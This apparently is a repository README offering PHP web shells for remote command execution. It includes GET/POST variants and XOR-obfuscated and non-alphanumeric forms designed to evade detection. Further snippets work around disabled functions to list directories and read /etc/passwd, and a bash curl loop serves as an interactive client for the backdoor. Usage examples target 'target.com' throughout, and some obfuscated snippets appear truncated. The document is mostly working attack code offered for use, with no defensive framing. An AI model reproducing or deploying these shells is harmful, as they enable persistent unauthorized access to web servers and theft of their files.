├── README.md ├── backdoor.PNG ├── cli.PNG └── obfusecate.PNG /README.md: -------------------------------------------------------------------------------- 1 | 2 | # Simple PHP Web Shell 3 | 4 | 5 | ### Simple HTTP Requests GET Method Shell 6 | ``` 7 | =`$_GET[0]`?> 8 | 9 | [*] Usage: http://target.com/path/to/shell.php?0=command 10 | ``` 11 | 12 | ### Simple HTTP Requests POST Method Shell 13 | ``` 14 | =`$_POST[0]`?> 15 | 16 | [*] Usage: curl -X POST http://target.com/path/to/shell.php -d "0=command" 17 | ``` 18 | 19 | ### Support GET and POST Requests Method 20 | ``` 21 | =`{$_REQUEST['_']}`?> 22 | 23 | [*] Usage: 24 | - http://target.com/path/to/shell.php?_=command 25 | - curl -X POST http://target.com/path/to/shell.php -d "_=command" 26 | ``` 27 | 28 | # Simple Obfuscated PHP Web Shell 29 | 30 | ### Obfuscated PHP Web shell Example 31 | ``` 32 | =$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?> 33 | 34 | [*] Usage: http://target.com/path/to/shell.php?0=command 35 | [*] Note: This is obfuscation of =`$_GET[0]`?> 36 | ``` 37 | 38 | ### Non-alphanumeric obfuscation PHP Web Shell 39 | ``` 40 | ;").($_^"/"); ?> =${'_'.$_}["_"](${'_'.$_}["__"]);?> 41 | 42 | [*] Usage: http://target.com/path/to/shell.php?_=function&__=argument 43 | [*] E.g.: http://target.com/path/to/shell.php?_=system&__=ls 44 | ``` 45 | 46 | ### Another Example Obfuscation of Simple PHP Webshell 47 | ``` 48 | /')};$_[0]($_[1]); ?> 49 | ;').('{'^'/')};$_[0]($_[1]); ?> 50 | 51 | [*] Usage: http://target.com/path/to/shell.php?0=function&1=argument 52 | [*] E.g.: http://target.com/path/to/shell.php?0=system&1=ls 53 | ``` 54 | 55 | ##### in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function: 56 | ``` 57 | /')};$_[0]($_[1]($_[2])); ?> 58 | ;').('{'^'/')};$_[0]($_[1]($_[2])); ?> 59 | 60 | [*] Usage: http://target.com/path/to/shell.php?0=function1&1=function2&2=argument 61 | [*] E.g.: 62 | - http://target.com/path/to/shell.php?0=var_dump&1=scandir&2=. 63 | - http://target.com/path/to/shell.php?0=print_r&1=file_get_contents&2=/etc/passwd 64 | ``` 65 | 66 | ### Without Space Obfuscation PHP Web Shell 67 | ``` 68 | =$_=${'_'.('{{{'^'<>/')};$_[0]($_[1]);?> 69 | 70 | [*] Usage: http://target.com/path/to/shell.php?0=function&1=argument 71 | [*] E.g.: http://target.com/path/to/shell.php?0=system&1=ls 72 | ``` 73 | 74 | ##### in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function: 75 | ``` 76 | =$_=${'_'.('{{{'^'<>/')};$_[0]($_[1]($_[2]));?> 77 | 78 | [*] Usage: http://target.com/path/to/shell.php?0=function1&1=function2&2=argument 79 | [*] E.g.: http://target.com/path/to/shell.php?0=print_r&1=glob&2=* 80 | ``` 81 | 82 | ### Without Space and Non-alphanumeric Obfuscation PHP Web Shell 83 | ``` 84 | =$_=${'_'.('{{{'^'<>/')};$_['__']($_['___']);?> 85 | 86 | [*] Usage: http://target.com/path/to/shell.php?__=function&___=argument 87 | [*] E.g.: http://target.com/path/to/shell.php?__=system&___=ls 88 | ``` 89 | 90 | ##### in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function: 91 | ``` 92 | =$_=${'_'.('{{{'^'<>/')};$_['__']($_['___']($_['____']));?> 93 | 94 | [*] Usage: http://target.com/path/to/shell.php?__=function1&___=function2&____=argument 95 | [*] E.g.: http://target.com/path/to/shell.php?__=var_dump&___=scandir&____=/ 96 | ``` 97 | 98 | # Simple Bash Script For Handle Simple PHP Backdoor 99 | 100 | ``` 101 | while true;do read -p "[>] halah@wibu:~$ " cmd;curl $1$cmd;done 102 | ``` 103 | with url encode: 104 | 105 | ``` 106 | while true;do read -p "[>] halah@wibu:~$ " cmd;curl -G $1 --data-urlencode "0=$cmd";done 107 | ``` 108 | 109 | save into cli.sh and give access to execute with ```chmod +x cli.sh``` 110 | 111 | [*] Usage: 112 | ``` 113 | ./cli.sh http://target.com/path/to/shell.php?0= 114 | ``` 115 | 116 |